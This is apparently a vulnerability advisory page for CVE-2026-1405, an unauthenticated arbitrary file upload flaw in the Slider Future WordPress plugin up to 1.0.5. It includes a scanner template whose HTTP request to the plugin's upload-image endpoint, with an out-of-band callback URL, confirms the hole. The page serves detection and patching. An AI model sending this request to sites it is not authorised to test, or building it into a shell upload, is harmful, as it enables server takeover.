WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
CVE-2026-1405
Verified
Description
Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
3%
Published Date
March 23, 2026
Template Author
pussycat0x
CVE-2026-1405.yaml
id: CVE-2026-1405
info:
name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
author: pussycat0x
severity: critical
description: |
Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
remediation: |
Update to a version later than 1.0.5 or the latest available version.
impact:
Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-1405
epss-score: 0.03177
epss-percentile: 0.86508
cwe-id: CWE-434
tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev
http:
- raw:
- |
POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"image_url":"http://{{interactsh-url}}"}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
- 'status_code == 200'
- 'contains(content_type,"application/json")'
- 'contains_all(body,"url","wp-content")'
condition: and
# digest: 4b0a004830460221009a5d3dd3c5e8558cdc0d64fc3a3ae385a59767df604a1e2d824d8cfed6b83e1b022100f0462542e863640aa210284737498ac96e86e34cb1174d7d25cd8f24a4cd091b:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-1405
CWE ID:
cwe-434
References
Remediation Steps
Update to a version later than 1.0.5 or the latest available version.